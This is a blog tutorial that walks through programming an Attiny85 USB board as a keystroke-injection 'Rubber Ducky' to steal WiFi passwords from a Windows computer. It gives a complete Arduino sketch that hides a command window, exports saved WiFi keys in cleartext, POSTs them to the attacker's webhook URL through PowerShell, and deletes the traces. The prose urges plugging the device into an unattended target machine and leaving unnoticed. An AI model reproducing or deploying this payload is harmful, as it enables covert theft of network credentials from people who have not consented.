3/14/2022

Attiny85 Rubber Ducky: WiFi Password Grabber

   _      _      _
 =(.)__ =(.)__ >(x)__
  (___/  (___/  (___/:]  

A much cheaper alternative to Hak5's USB Rubber Ducky. You can use this USB micrcontroller for everything from stealing WiFi passwords to keylogging. We will focus on stealing WiFi passwords in this tutorial by creating a poor-man's USB Rubber Ducky that will discreetly steal WiFi passwords from a target computer running Windows and callback the information to a webhook in about 4-5 seconds.

Items Required:
-Attiny85 General Micro USB Development Board (Purchase Here)
-Target Computer Running Windows

Resources:
Arduino IDE
Digistump Drivers
Attiny85 Ducky Payloads 
Webhook.site

Start by downloading and installing the Digistump Drivers from Github. To do this, unzip the "Digistump.Drivers" zip file using 7-Zip, WinZip, etc. Open the unzipped folder and click the "Install Drivers" exe file and continue through the setup wizard.

Once the setup process is complete it's time to move over to the Arduino IDE, which you can install from the link under "Resources:" above. In this tutorial I used the standard Arduino IDE. There is now the Arduino IDE 2.0 RC which features a more stable build. The steps in this tutorial will work with both. Once it is installed, boot up the Arduino IDE and insert your Attiny85 USB. Please note, your computer might make an alert/notification sound after discovering the device.

We will need to do some configuring to the Arduino IDE. Start by opening the Preferences window by clicking File > Preferences. Enter "http://digistump.com/package_digistump_index.json" in the field labeled "Additional Boards Manager URLs".

Next, go to Tools > Board > Board Manager and select "Contributed" from the "Type:" drop-down field. Select the package labeled "Digistump AVR Boards" and install it. From within that Boards section we can also select "Digispark (Default - 16.5mhz)" from the list of boards. Also make sure you select your Attiny85's correct COM port.

Now it's time to paste our payload. We have a lot of payload options for the Attiny85 Rubber Ducky. I suggest checking out some of them on the Attiny85 Ducky Payloads Github page. For this tutorial, we will be using a slightly altered version of the "Wi-Fi password stealer" created by MTK911. I found slightly altering some of the timing within the code made it operate smoother.

Create a new sketch by clicking File > New and paste the code below:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include "DigiKeyboard.h"
#define KEY_DOWN 0x51 // Keyboard Down Arrow
#define KEY_ENTER 0x28 //Return/Enter Key

void setup() {
  pinMode(1, OUTPUT); //LED on Model A 
}

void loop() {
   
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
 
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible
  DigiKeyboard.delay(500);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); //Menu  
  DigiKeyboard.sendKeyStroke(KEY_M); //goto Move
  for(int i =0; i < 100; i++)
    {
      DigiKeyboard.sendKeyStroke(KEY_DOWN);
    }
  DigiKeyboard.sendKeyStroke(KEY_ENTER); //Detach from scrolling
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cd %temp%"); //going to temporary dir
  DigiKeyboard.delay(500);
  DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("powershell Invoke-WebRequest -Uri #INSERT WEBHOOK LINK HERE# -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("del Wi-* /s /f /q"); //cleaning up all the mess
  DigiKeyboard.delay(500);
  DigiKeyboard.println("exit");
  DigiKeyboard.delay(100);
  
  digitalWrite(1, HIGH); //turn on led when program finishes
  DigiKeyboard.delay(90000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
  
}

On line 34 of the code we will need to replace the "#INSERT WEBHOOK LINK HERE#" with your own personal Webhook.site URL. To obtain a Webhook.site URL, you can just visit Webhook.site. This will give you your own Webhook.site control panel where you can copy the URL labeled "Your unique URL". Paste this URL into your code, replacing "#INSERT WEBHOOK LINK HERE#". Our code is now ready for upload.

Click the check mark (✔) in the top left-hand corner. This verifies the code along with the current device plugged in. Once verification is complete click the arrow (→) next to the check mark to upload the code to the Attiny85 device. You will receive a "Done uploading" message at the bottom left-hand corner of the Arduino IDE. You're ready to start grabbing some passwords!

With a target Windows computer in arms reach, preferably unaccompanied, insert your new WiFi Password Grabbing device into an open USB slot. The device will automatically open the Windows command prompt, resize the screen to the bottom right-hand corner of the desktop (sneaky!), and will locate saved WiFi passwords on the target computer. In about 4-5 seconds, your device's LED will light up to notify you the payload is complete. Unplug the device and walk away while not looking suspicious.

Using your mobile phone or personal computer, visit your Webhook.site URL from earlier. You should have a new request! Open the request and you will find a list of SSIDs and passwords from the target computer.

Your Attiny85 can be reprogrammed with different payloads. I suggest checking out the others featured on MTK911's Github.

2 comments:

  1. this is a really good summary and explanation! cheers

    ReplyDelete
  2. I presume its illegal to do this in most cases

    ReplyDelete